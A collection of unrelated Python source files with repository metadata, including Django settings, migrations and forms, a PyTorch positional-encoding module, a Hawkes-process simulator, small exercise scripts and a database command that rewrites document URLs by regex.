        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
[
"nbgao@126.com"
] |
nbgao@126.com
|
ff78da37b44bb65fde789b0424eb2ee373574348
|
b61435024bf60b1fb38b780bdcd4c7c8a10c0b5e
|
/users/migrations/0001_initial.py
|
1f9b7828edacf11667f5676ea0b2c303e4fd3d93
|
[] |
no_license
|
ysmt1/muaythaidb-V2
|
ff54f445c6b626fcd93ebfe1338eea4f83d9516c
|
cc705cc8d8b2cadc82b16bc303ef065f447138a3
|
refs/heads/master
| 2022-11-20T07:36:57.842490
| 2022-11-19T19:36:20
| 2022-11-19T19:36:20
| 225,264,459
| 1
| 0
| null | 2020-08-23T21:42:32
| 2019-12-02T02:05:11
|
Python
|
UTF-8
|
Python
| false
| false
| 1,174
|
py
|
# Generated by Django 2.2.5 on 2019-11-09 17:05
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial users migration: creates the Profile model.

    Profile is one-to-one with the auth user and carries an avatar image,
    free-text location/experience/fighter fields, and an optional gym
    check-in FK into the mtdb app (SET_NULL so deleting a gym keeps the
    profile).
    """
    initial = True
    dependencies = [
        ('mtdb', '0002_auto_20191109_1102'),
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        migrations.CreateModel(
            name='Profile',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # 'TBA' upload path looks like a placeholder - confirm
                ('image', models.ImageField(default='default.jpg', upload_to='TBA')),
                ('location', models.CharField(blank=True, max_length=200)),
                ('experience', models.CharField(blank=True, max_length=200)),
                ('fighter', models.CharField(blank=True, max_length=200)),
                ('checkin', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='mtdb.Gym')),
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
|
[
"yosuke.seki@gmail.com"
] |
yosuke.seki@gmail.com
|
394d72d7e339049da0981c27d5ada941e57367d6
|
1bad3878c36e54a8da5af81a7ddae7495f7872a6
|
/codewars/7kyu/two_oldest_ages.py
|
8be6332bb674a5dbbad06f67604d7cd2ea960e3e
|
[] |
no_license
|
Codewithml/coding-problems-solutions
|
bb8e9f039d0864366739215da033515679e907ba
|
c2f7982c6c3d24d7ab384cd0d85bf242ca94b9ff
|
refs/heads/master
| 2023-02-04T20:06:58.072687
| 2020-12-29T10:04:17
| 2020-12-29T10:04:17
| 297,561,438
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 150
|
py
|
def two_oldest_ages(ages):
    """Return the two largest ages, in ascending order.

    With fewer than two ages, the sorted input is returned unchanged.
    """
    top_pair = sorted(ages, reverse=True)[:2]
    return top_pair[::-1]
if __name__ == "__main__":
    print(two_oldest_ages([1, 5, 87, 45, 8, 8]))
|
[
"codingwithml@gmail.com"
] |
codingwithml@gmail.com
|
0f698146fae3955d544faba816ebc4a3c9197b0c
|
a89c739589d0ee29ff6fff1a1508a426dfe4489a
|
/filehandling/writefile.py
|
0e672cf3be29baf61ed2400e2cf1332ce48c0309
|
[] |
no_license
|
macabdul9/python-learning
|
107e3533998e3f373b804d6b59152fc41938604b
|
f0d5e0e37cbed3d846684be80f0f92e5cbb9ceb5
|
refs/heads/master
| 2020-04-27T04:31:47.907486
| 2020-03-05T16:48:53
| 2020-03-05T16:48:53
| 174,057,604
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 409
|
py
|
"""
@author : macab (macab@debian)
@file : writefile
@created : Wednesday Mar 20, 2019 22:46:12 IST
"""
def writefile():
    """Write a few sample lines to 'firstfile.txt' in the current directory.

    Fix: the original opened the file and never closed it; a context
    manager now guarantees the handle is flushed and closed even if a
    write raises.
    """
    with open('firstfile.txt', 'wt') as myfile:
        myfile.write('adfhdsdssfsd\n')
        # writelines() with a single string writes that string unchanged
        myfile.writelines('asfssdhd\n')
        myfile.write('sdfjhdsdasjdhfsdkasjfvd\n')
        myfile.write('dsdfdsf vdvscdc fvdvsd\n')
        myfile.write('fdjks')
if __name__ == "__main__":
    writefile()
|
[
"abdulwaheed1513@gmail.com"
] |
abdulwaheed1513@gmail.com
|
86b7a832f9aa87fa331359ba471bc4bc5acd9411
|
46732d613208ee4096fbbd3fd74f22146471d1ce
|
/wangyiyun_songs&lyrics/all_singer歌手情绪分析/许巍/sentiments_test.py
|
c0df0d2f4a5e192faf3a2c8113832f326316fc06
|
[] |
no_license
|
cassieeric/python_crawler
|
7cb02f612382801ae024e2cee70e0c2bcdba927c
|
6d2b4db3d34183d729f6fd30555c6d6f04514260
|
refs/heads/master
| 2022-11-30T20:30:50.031960
| 2022-11-27T02:53:22
| 2022-11-27T02:53:22
| 118,204,154
| 322
| 283
| null | 2022-12-21T09:33:08
| 2018-01-20T03:17:14
|
HTML
|
UTF-8
|
Python
| false
| false
| 865
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from snownlp import SnowNLP
# 积极/消极
# print(s.sentiments) # 0.9769551298267365 positive的概率
def get_word():
    # Read keyword lines from the lyrics-keyword file and return them as a
    # list of stripped strings.
    # NOTE(review): the first readline() result is discarded before the
    # loop (presumably a header line) and the final empty read at EOF is
    # appended as '' - confirm both behaviors are intentional.
    with open("许巍歌词关键字.txt") as f:
        line = f.readline()
        word_list = []
        while line:
            line = f.readline()
            word_list.append(line.strip('\r\n'))
        # redundant inside "with" (the context manager closes f), harmless
        f.close()
    return word_list
def get_sentiment(word):
    """Print the SnowNLP positive-sentiment probability for *word*."""
    snlp = SnowNLP(u'{}'.format(word))
    print(snlp.sentiments)
# Script entry point: score every keyword extracted from the lyrics file.
if __name__ == '__main__':
    words = get_word()
    for word in words:
        get_sentiment(word)
    # --- scratch code from earlier experiments, kept disabled ---
    # text = u'''
    # 也许
    # '''
    # s = SnowNLP(text)
    # print(s.sentiments)
    # with open('lyric_sentiments.txt', 'a', encoding='utf-8') as fp:
    #     fp.write(str(s.sentiments)+'\n')
    # print('happy end')
|
[
"noreply@github.com"
] |
cassieeric.noreply@github.com
|
8a85a7f0d42f7a5fe8b24aa019620fd6764b2f8c
|
c955a679765e3f13e6b936b676ec6542374711fe
|
/04_dictionaries_lambdas_functional_programming/07_user_logins.py
|
970e35cfc8e4892d67159b0b3f3ccc1b06581027
|
[
"Apache-2.0"
] |
permissive
|
ivaylokanov/Python
|
6912eb35b0dcd0f88396483b6b104fb8b780dcd0
|
af219356d7034de3004a0012603654756d436c08
|
refs/heads/master
| 2018-07-06T12:28:58.596748
| 2018-05-31T23:35:29
| 2018-05-31T23:35:29
| 118,973,980
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 743
|
py
|
# Console login simulator.
# Phase 1: read "user -> password" registration pairs until the literal
# word "login" appears.  Phase 2: read "user -> password" attempts until
# "end", printing success/failure per attempt and counting the failures.
login_base = {}  # username -> password
counter = 0      # number of failed login attempts
while True:
    array_users = [item for item in input().split(" -> ")]
    if array_users[0] == "login":
        break
    else:
        login_base[array_users[0]] = array_users[1]
while True:
    array_logs = [item for item in input().split(" -> ")]
    if array_logs[0] == "end":
        break
    else:
        if array_logs[0] in login_base:
            if array_logs[1] == login_base[array_logs[0]]:
                print(f"{array_logs[0]}: logged in successfully")
            else:
                # known user, wrong password
                print(f"{array_logs[0]}: login failed")
                counter += 1
        else:
            # unknown user
            print(f"{array_logs[0]}: login failed")
            counter += 1
print(f"unsuccessful login attempts: {counter}")
|
[
"kanov.ivo@gmail.com"
] |
kanov.ivo@gmail.com
|
6e246e7a9673615d7b3d613c7b5f03591fe7f6de
|
f24754d4491b3f84831185e1ba8314eea65ef734
|
/neural_sp/models/modules/positional_embedding.py
|
186973af546a9f5f7c63348ceb1995c4a4d09957
|
[
"Apache-2.0"
] |
permissive
|
ggsonic/neural_sp
|
a7e04bd397e702598aba091aa2142c09b0ba4b31
|
30fc2b799151e82ffb73c77972f9fd47a5b1fd11
|
refs/heads/master
| 2023-01-10T08:03:48.275303
| 2020-11-04T16:47:16
| 2020-11-04T16:47:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,543
|
py
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2020 Kyoto University (Hirofumi Inaguma)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""Positional Embeddings."""
import copy
import logging
import math
import torch
import torch.nn as nn
from neural_sp.models.modules.causal_conv import CausalConv1d
logger = logging.getLogger(__name__)
class PositionalEncoding(nn.Module):
    """Positional encoding for Transformer.
    Args:
        d_model (int): dimension of MultiheadAttentionMechanism
        dropout (float): dropout probability
        pe_type (str): type of positional encoding ('none', 'add', or a
            string containing '1dconv' followed by a layer count digit)
        param_init (str): parameter initialization method
        max_len (int): maximum lenght for sinusoidal positional encoding
        conv_kernel_size (int): window size for 1dconv positional encoding
        layer_norm_eps (float): epsilon value for layer normalization
    """
    def __init__(self, d_model, dropout, pe_type, param_init, max_len=5000,
                 conv_kernel_size=3, layer_norm_eps=1e-12):
        super().__init__()
        self.d_model = d_model
        self.pe_type = pe_type
        # sqrt(d_model) scaling applied to embeddings in forward()
        self.scale = math.sqrt(self.d_model)
        if '1dconv' in pe_type:
            # Learned positional encoding: self.pe becomes an nn.Sequential
            # of causal-conv blocks (conv -> LayerNorm -> ReLU -> Dropout).
            causal_conv1d = CausalConv1d(in_channels=d_model,
                                         out_channels=d_model,
                                         kernel_size=conv_kernel_size,
                                         param_init=param_init)
            layers = []
            # NOTE(review): assumes pe_type embeds a single digit layer
            # count right after '1dconv' (e.g. '1dconv3') - confirm format.
            nlayers = int(pe_type.replace('1dconv', '')[0])
            for _ in range(nlayers):
                layers.append(copy.deepcopy(causal_conv1d))
                layers.append(nn.LayerNorm(d_model, eps=layer_norm_eps))
                layers.append(nn.ReLU())
                layers.append(nn.Dropout(p=dropout))
            self.pe = nn.Sequential(*layers)
        elif pe_type != 'none':
            # Compute the positional encodings once in log space.
            # Here self.pe is a fixed (non-trainable) buffer instead of a
            # module; forward() dispatches on pe_type accordingly.
            pe = torch.zeros(max_len, d_model, dtype=torch.float32)
            position = torch.arange(0, max_len, dtype=torch.float32).unsqueeze(1)
            div_term = torch.exp(torch.arange(0, d_model, 2).float() * -(math.log(10000.0) / d_model))
            pe[:, 0::2] = torch.sin(position * div_term)
            pe[:, 1::2] = torch.cos(position * div_term)
            pe = pe.unsqueeze(0)  # for batch dimension
            self.register_buffer('pe', pe)
        self.dropout = nn.Dropout(p=dropout)
        logger.info('Positional encoding: %s' % pe_type)
    def forward(self, xs, scale=True):
        """Forward pass.
        Args:
            xs (FloatTensor): `[B, T, d_model]`
            scale (bool): multiply xs by sqrt(d_model) before adding PE
        Returns:
            xs (FloatTensor): `[B, T, d_model]`
        """
        if scale:
            xs = xs * self.scale
            # NOTE: xs is an embedding before scaling
        if self.pe_type == 'none':
            xs = self.dropout(xs)
            return xs
        elif self.pe_type == 'add':
            # add the precomputed sinusoidal buffer, truncated to seq length
            xs = xs + self.pe[:, :xs.size(1)]
            xs = self.dropout(xs)
        elif '1dconv' in self.pe_type:
            # learned encoding: run xs through the conv stack
            xs = self.pe(xs)
        else:
            raise NotImplementedError(self.pe_type)
        return xs
class XLPositionalEmbedding(nn.Module):
    """Relative sinusoidal positional embedding (TransformerXL style)."""
    def __init__(self, d_model, dropout):
        super().__init__()
        self.d_model = d_model
        # inverse frequencies of the sinusoid: 1 / 10000^(2i / d_model)
        exponents = torch.arange(0.0, d_model, 2.0) / d_model
        self.register_buffer("inv_freq", 1 / (10000 ** exponents))
        self.dropout = nn.Dropout(p=dropout)

    def forward(self, xs, mlen=0, clamp_len=-1, zero_center_offset=False):
        """Build position embeddings for a sequence plus its memory.

        Args:
            xs (FloatTensor): `[B, L, d_model]` (only length/device used)
            mlen (int): length of the TransformerXL memory
            clamp_len (int): if positive, clamp position indices here
            zero_center_offset (bool): shift indices so position 0 sits at
                the start of the current segment
        Returns:
            pos_emb (FloatTensor): `[mlen + L, 1, d_model]`
        """
        seq_len = xs.size(1)
        if zero_center_offset:
            positions = torch.arange(mlen - 1, -seq_len - 1, -1.0,
                                     dtype=torch.float, device=xs.device)
        else:
            positions = torch.arange(mlen + seq_len - 1, -1, -1.0,
                                     dtype=torch.float, device=xs.device)
        # truncate by maximum length
        if clamp_len > 0:
            positions.clamp_(max=clamp_len)
        # outer product -> [num_positions, d_model // 2]
        angles = torch.einsum("i,j->ij", positions, self.inv_freq)
        embeddings = torch.cat([angles.sin(), angles.cos()], dim=-1)
        return self.dropout(embeddings).unsqueeze(1)
|
[
"hiro.mhbc@gmail.com"
] |
hiro.mhbc@gmail.com
|
c761b34f0fd1c6ab9f45a9620395af8d6d4376ec
|
06fceff5ad47bcb4631dc7bfc8a42614501e72da
|
/src/post/forms.py
|
08f659bf1b2867908d8b5e7df506c9db0eb41b6d
|
[] |
no_license
|
eaglesdgreat/Django-Blog_App
|
06912c6bd794a51880e620c1df418a8c2e7d9051
|
807dd426eaf7926e78591158bfe7f6801258be3a
|
refs/heads/master
| 2021-01-01T21:06:29.951872
| 2020-02-09T16:57:03
| 2020-02-09T17:00:12
| 239,339,352
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 820
|
py
|
from django import forms
from tinymce import TinyMCE
from .models import Post, Comment
class TinyMCEWidget(TinyMCE):
    """TinyMCE widget that never emits the HTML `required` attribute;
    presumably to avoid browser validation on the editor-replaced textarea
    (NOTE(review): rationale inferred - confirm)."""
    def use_required_attribute(self, *args):
        return False
class PostForm(forms.ModelForm):
    """Model form for creating/editing blog posts.

    The `content` field is overridden to render with the TinyMCE rich-text
    widget defined above.
    """
    content = forms.CharField(
        widget=TinyMCEWidget(
            attrs={'required': False, 'cols': 30, 'rows': 10}
        )
    )
    class Meta:
        model = Post
        fields = ('title', 'overview', 'content', 'thumbnail', 'categories', 'featured', 'previous_post', 'next_post')
class CommentForm(forms.ModelForm):
    """Model form for submitting a comment: a single styled textarea."""
    content = forms.CharField(widget=forms.Textarea(attrs={
        'class': 'form-control',
        'placeholder': 'Type Your Comment',
        'id': 'usercomment',
        'rows': '4'
    }))
    class Meta:
        model = Comment
        fields = ('content',)
|
[
"eaglesemmanuel@outlook.com"
] |
eaglesemmanuel@outlook.com
|
48a7e203891d43b65a09396ac8b965695cc0ea38
|
745aa88c09d5cfd8ce49d2f3efcb131c08c1c586
|
/notification/migrations/0001_initial.py
|
159807e220bfa5a090378cf4c1b11f908a7e22e8
|
[] |
no_license
|
Albina93/twitterclone
|
295ff4c157fb36610fa60061b682348d7858d1e2
|
244d1f7015b214fdd2c03f23a41f18141e7c8910
|
refs/heads/master
| 2022-12-11T09:43:17.126680
| 2020-09-04T22:51:14
| 2020-09-04T22:51:14
| 291,776,349
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,000
|
py
|
# Generated by Django 3.1 on 2020-09-04 15:58
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial notification migration: creates the Notification model
    linking a received tweet and its receiving user (both CASCADE)."""
    initial = True
    dependencies = [
        ('tweet', '0002_tweet_twitter_user'),
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        migrations.CreateModel(
            name='Notification',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # null until the notification is delivered/read - confirm
                ('date_receive', models.DateTimeField(blank=True, default=None, null=True)),
                ('tweet_receive', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='tweet_receive', to='tweet.tweet')),
                ('user_receive', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='receive', to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
|
[
"alba.tleubergen@gmail.com"
] |
alba.tleubergen@gmail.com
|
2e3dcc974eae031b9b501b353ec3c65c57bad29f
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03287/s251583838.py
|
449f468833a9876dddf1d4cd0215a01955885e96
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 286
|
py
|
# Count subarrays of A whose sum is divisible by M, via the prefix-sum
# trick: sum(A[i..j]) % M == 0  <=>  B[j+1] == B[i] (mod M), so every
# residue appearing k times among prefix sums contributes C(k, 2) pairs.
from collections import Counter
N, M = map(int, input().split())
A = [int(i)%M for i in input().split()]
B = [0] * (N+1)  # B[i] = (A[0] + ... + A[i-1]) % M
for i in range(N):
    B[i+1] = (B[i]+A[i]) % M
counter = dict(Counter(B))
ans = 0
for num in counter:
    # k*(k-1)/2 pairs of equal residues
    ans += (counter[num]-1) * counter[num] // 2
print(ans)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
959a9840ad80fc376d6f2008e5a76bd02c9a731e
|
aad07595625e504988d18509e587e63fd3b4cd38
|
/phase_03/v2.0/utilities/data_processing.py
|
0d1e57e3c9d8a61d57b7f39ee7d266f0a0eeb99c
|
[] |
no_license
|
KumaranShivam5/aurora
|
8533a399ecd7e4c333e2fb36cb536dc6957e523d
|
bde4711baf4d50fa28fc871e2251fda85c4783cf
|
refs/heads/main
| 2023-08-21T09:47:36.601207
| 2021-10-23T20:42:40
| 2021-10-23T20:42:40
| 380,564,957
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,313
|
py
|
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
# Merge the CV and LMXRB catalogs, shuffle the rows, coerce every string
# cell to float (non-numeric strings become 0), and write the compiled CSV.
cv_data = pd.read_csv('cv_data.csv')
xrb_data = pd.read_csv('lmxrb_all_data.csv')
print(cv_data.shape)
print(xrb_data.shape)
#print(cv_data)
all_data = pd.concat([cv_data , xrb_data] , ignore_index=True)
#print(all_data)
#print(all_data.shape)
#all_data['class']
# shuffle all rows, then reset to a clean 0..m-1 index
all_data = all_data.sample(frac=1).reset_index(drop=True)
all_data.index.name = "index_compiled"
print('Normalizing data')
#print(all_data)
m, n = all_data.shape
total = m*n
count = 0
for i in range(m):
    for j in range(n):
        count+=1
        per = ((count/total)*100)
        # NOTE(review): `per` is a float, so per % 5 == 0 holds only when
        # the division is exact - progress lines rarely print; confirm.
        if(per%5==0):
            print('{:.0f} done'.format(per))
        if isinstance(all_data.iloc[i,j],str):
            #print(i,j,all_data.iloc[i,j])
            try:
                all_data.iloc[i,j] = float(all_data.iloc[i,j])
            except:
                # NOTE(review): bare except silently zeroes any cell that
                # fails float() - deliberate best-effort, but it also hides
                # unexpected errors.
                #print('ivalid , setting to zero' , i, j, all_data.iloc[i,j])
                all_data.iloc[i,j]=0
np.amax(all_data)
'''
for i in range(2,n):
    max_non_zero = np.amax(all_data.iloc[:,i])
    if(max_non_zero==0):
        continue
    else:
        all_data.iloc[:,i] = all_data.iloc[:,i] / np.amax(all_data.iloc[:,i])
    #print(i)
'''
print(np.amax(all_data))
all_data.to_csv('all_data_compiled_v2.csv')
|
[
"kumaranshivam57@gmail.com"
] |
kumaranshivam57@gmail.com
|
b0d0f187d9d1d4ad21b33bedfbd7788e418c295e
|
7bfa634d1ad17d7c9fbb49fea6d9adf099b9e61b
|
/openprocurement/patchdb/commands/replace_documents_url.py
|
066c4f4f59d2497d500775fd664ee6014b602bd6
|
[
"Apache-2.0"
] |
permissive
|
imaginal/openprocurement.patchdb
|
b46430132ef594b2aa06e46948bc1d076cdbe13c
|
1a612fa97d9ea58bf02294105c787aabc21eeee0
|
refs/heads/master
| 2020-03-13T20:34:23.858470
| 2018-10-01T12:55:59
| 2018-10-01T12:55:59
| 131,277,470
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,816
|
py
|
import re
from copy import deepcopy
from openprocurement.patchdb.commands import BaseCommand
class Command(BaseCommand):
    """Patchdb command: rewrite document and/or auction URLs in tenders.

    Walks each tender's nested structure, treats any dict carrying the
    document key set (id/title/format/url) or the auction key set
    (id/title/value/auctionUrl) as a target, applies the configured regex
    substitution to its URL, and saves tenders with at least one change.
    """
    help = 'Replace domain in documents or auction URL'
    # minimum key sets identifying a document / auction dict
    required_document_fields = set(['id', 'title', 'format', 'url'])
    required_auction_fields = set(['id', 'title', 'value', 'auctionUrl'])
    # compiled search patterns; stay None while the option is unset
    auction_url_search = None
    doc_url_search = None
    @staticmethod
    def add_arguments(parser):
        # *-search options are regexps; *-replace the substitution text
        parser.add_argument('--doc-url-search', default='',
                            help='document URL to search (regexp)')
        parser.add_argument('--doc-url-replace', default='',
                            help='document URL to replace')
        parser.add_argument('--auction-url-search', default='',
                            help='auction URL to search (regexp)')
        parser.add_argument('--auction-url-replace', default='',
                            help='auction URL to replace')
    def check_arguments(self, args):
        # Compile whichever patterns were supplied; at least one required.
        if not args.doc_url_search and not args.auction_url_search:
            raise ValueError("Nothing to search")
        if args.doc_url_search:
            self.doc_url_search = re.compile(args.doc_url_search)
            self.doc_url_replace = args.doc_url_replace
        if args.auction_url_search:
            self.auction_url_search = re.compile(args.auction_url_search)
            self.auction_url_replace = args.auction_url_replace
    def document_replace_url(self, doc):
        # Return True when the document URL matched and was rewritten.
        if self.doc_url_search and self.doc_url_search.search(doc['url']):
            doc['url'] = self.doc_url_search.sub(self.doc_url_replace, doc['url'])
            return True
        return False
    def auction_replace_url(self, doc):
        # Return True when the auction URL matched and was rewritten.
        if self.auction_url_search and self.auction_url_search.search(doc['auctionUrl']):
            doc['auctionUrl'] = self.auction_url_search.sub(self.auction_url_replace, doc['auctionUrl'])
            return True
        return False
    def recursive_find_and_replace(self, root):
        # Depth-first walk over nested dicts/lists; returns the number of
        # URL replacements performed (bools are summed as 0/1).
        res = 0
        if isinstance(root, dict):
            if set(root.keys()) >= self.required_document_fields:
                res += self.document_replace_url(root)
            if set(root.keys()) >= self.required_auction_fields:
                res += self.auction_replace_url(root)
            for item in root.values():
                if isinstance(item, (dict, list)):
                    res += self.recursive_find_and_replace(item)
        elif isinstance(root, list):
            for item in root:
                res += self.recursive_find_and_replace(item)
        return res
    def patch_tender(self, patcher, tender, doc):
        # Mutate a deep copy so the original doc stays intact on no-op.
        new = deepcopy(doc)
        if self.recursive_find_and_replace(new) > 0:
            patcher.save_tender(tender, doc, new)
        patcher.check_tender(tender, tender.tenderID)
|
[
"flyonts@gmail.com"
] |
flyonts@gmail.com
|
7208675c1e66c9f8bb478d321635d0e73316df78
|
1294f7aa1c21bf126c26d9ecd0d2cafe1fe1e6c7
|
/simulation.py
|
727c9efd6aa616b1e138eecd09f694aa1bf4761a
|
[] |
no_license
|
woshiyyya/Multivariate-Hawks-Process
|
53eb69954f3cb11de1f19e34482af988f2fc1544
|
961d91542fcfbc0ec89d9575d583f9b713110a2b
|
refs/heads/master
| 2020-06-01T16:21:06.248927
| 2019-06-08T05:22:10
| 2019-06-08T05:22:10
| 190,847,872
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,283
|
py
|
import numpy as np
from math import exp, log
import matplotlib.pyplot as plt
import pickle
from tqdm import tqdm
import os
from argparse import ArgumentParser
# Multivariate Hawkes process parameters (Z = 10 dimensions).
# U: baseline intensities; A: excitation weights - in intensity() below,
# A[dim][i] weights the events of history[i] when computing dimension dim.
U = [0.001, 0, 0.1, 0.005, 0.007, 0.0025, 0.003, 0.0069, 0.0081, 0.0043]
A = [[0.1, 0.072, 0.0044, 0, 0.0023, 0, 0.09, 0, 0.07, 0.025],
     [0, 0.05, 0.068, 0, 0.027, 0.065, 0, 0, 0.097, 0],
     [0.093, 0, 0.0062, 0.045, 0, 0, 0.053, 0.0095, 0, 0.083],
     [0.019, 0.0033, 0, 0.073, 0.058, 0, 0.056, 0, 0, 0],
     [0.045, 0.091, 0, 0, 0.066, 0, 0, 0.033, 0.0058, 0],
     [0.067, 0, 0, 0, 0, 0.055, 0.063, 0.078, 0.085, 0.0095],
     [0, 0.022, 0.0013, 0, 0.057, 0.091, 0.0088, 0.065, 0, 0.073],
     [0, 0.09, 0, 0.088, 0, 0.078, 0, 0.09, 0.068, 0],
     [0, 0, 0.093, 0, 0.033, 0, 0.069, 0, 0.082, 0.033],
     [0.001, 0, 0.089, 0, 0.008, 0, 0.0069, 0, 0, 0.072]
     ]
w = 0.6   # exponential decay rate of the excitation kernel
Z = 10    # number of process dimensions
T = 1e5   # time horizon (not referenced elsewhere in this chunk)
def intensity(t, dim, history):
    """Conditional intensity of dimension *dim* at time *t*.

    lambda_dim(t) = U[dim] + sum_i A[dim][i] * sum_{ti in history[i]} exp(-w (t - ti))
    """
    weights = A[dim]
    excitation = 0
    for src in range(Z):
        kernel = [exp(-w * (t - ti)) for ti in history[src]]
        excitation += weights[src] * sum(kernel)
    return U[dim] + excitation
def multi_intensity(t, history):
    """Return (total intensity, per-dimension intensity array) at time *t*."""
    per_dim = np.array([intensity(t, d, history) for d in range(Z)])
    return np.sum(per_dim), per_dim
def get_candidate(proposal, prob):
    """Return the index of the bin of *prob* that *proposal* falls into
    (inverse-CDF sampling over unnormalised weights)."""
    assert proposal < sum(prob)
    cumulative = 0
    dim = 0
    for p in prob:
        cumulative += p
        if proposal < cumulative:
            return dim
        dim += 1
def sample(max_num=100):
    """Draw *max_num* events from the multivariate Hawkes process.

    Appears to follow an Ogata-style thinning scheme: the next candidate
    time is an exponential draw at the current total intensity, accepted
    with probability lambda(t_new)/lambda(t_prev).
    NOTE(review): the same uniform `proposal` is reused for the accept
    test and (rescaled by prev_lambda) for choosing the event dimension -
    confirm this coupling is intended.

    Returns:
        history: list of Z per-dimension lists of event times.
    """
    t = 0
    cnt = 0
    history = [[] for _ in range(Z)]
    pbar = tqdm(total=max_num)
    while cnt < max_num:
        prev_lambda, _ = multi_intensity(t, history)
        # candidate inter-arrival time ~ Exp(prev_lambda)
        t += -log(np.random.rand()) / prev_lambda
        proposal = np.random.rand()
        cur_lambda, cur_intensity = multi_intensity(t, history)
        if proposal < cur_lambda / prev_lambda:
            # accepted: attribute the event proportionally to each
            # dimension's share of the current intensity
            cur_dim = get_candidate(proposal * prev_lambda, cur_intensity)
            history[cur_dim].append(t)
            cnt += 1
            pbar.update(1)
    pbar.close()
    return history
def index_events(history):
    """Flatten a per-dimension event history into a time-sorted list plus a
    lookup mapping each event time to its (dimension, position) pair."""
    all_times = []
    for times in history:
        all_times.extend(times)
    all_times.sort()
    mapping = {}
    for dim, times in enumerate(history):
        for pos, t in enumerate(times):
            mapping[t] = (dim, pos)
    return all_times, mapping
def display(history, dim):
    """Plot the counting process N(t) and the intensity of one dimension,
    save the figure as hawks_dim<dim>.png, and show it."""
    fig, axs = plt.subplots(2, 1)
    # step-plot data for the cumulative event count of this dimension
    x1 = [0] + history[dim]
    y1 = [0] + list(range(0, len(history[dim])))
    x2 = []
    y2 = []
    event_seq, event_mapping = index_events(history)
    total_events = len(event_seq)
    # replay events in time order so the intensity at each grid point is
    # computed from only the events that have already occurred
    recap_history = [[] for _ in range(Z)]
    for k in range(total_events - 1):
        t, t_next = event_seq[k], event_seq[k + 1]
        i, j = event_mapping[t]
        recap_history[i].insert(j, t)
        # sample the intensity on a 10-point grid between adjacent events
        sampled_x = np.linspace(t, t_next, 10).tolist()
        sampled_y = []
        for xi in sampled_x:
            sampled_y.append(intensity(xi, dim, recap_history))
        x2.extend(sampled_x)
        y2.extend(sampled_y)
    start_time = min(x2)
    end_time = max(x2)
    # extend the step plot flat to the final plotted time
    x1.append(end_time)
    y1.append(y1[-1])
    x2 = [0, start_time] + x2
    y2 = [0, 0] + y2
    axs[0].step(x1, y1)
    axs[1].plot(x2, y2)
    axs[0].set_xlim(0, end_time)
    axs[1].set_xlim(0, end_time)
    axs[0].set_xlabel('time')
    axs[0].set_ylabel(f'Occurrence N(t)')
    axs[1].set_xlabel('time')
    axs[1].set_ylabel(f'Intensity (dim{dim})')
    axs[0].grid(True)
    axs[1].grid(True)
    fig.tight_layout()
    plt.savefig(f'hawks_dim{dim}.png')
    plt.show()
def gen_data(max_num, max_seqs):
    """Sample *max_seqs* independent event histories of *max_num* events
    each and pickle them under data/seq<max_num>/.

    Fix: the pickle file is now opened with a context manager so each
    handle is flushed and closed deterministically (the original passed a
    bare open() to pickle.dump and relied on garbage collection).
    """
    out_dir = f'data/seq{max_num}'
    os.makedirs(out_dir, exist_ok=True)
    for i in range(max_seqs):
        history = sample(max_num)
        with open(f'{out_dir}/sample{max_num}_seq{i}.pkl', 'wb') as fh:
            pickle.dump(history, fh)
# CLI entry point: either generate a batch of pickled histories
